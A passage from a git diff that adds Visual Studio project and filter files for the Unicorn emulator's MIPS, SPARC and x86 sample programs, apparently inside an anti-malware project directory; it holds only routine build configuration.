<UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_mips.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters new file mode 100644 index 0000000..9551457 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_mips.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj new file mode 100644 index 0000000..2f4ed55 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{A25CA34D-2F64-442B-A5D3-B13CB56C9957}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_sparc</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_sparc.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters new file mode 100644 index 0000000..306de23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_sparc.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj new file mode 100644 index 0000000..bfb2b1f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj @@ -0,0 +1,193 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F8053D66-8267-433A-BF2C-E07E2298C338}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_x86</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__x86_64__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__x86_64__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + 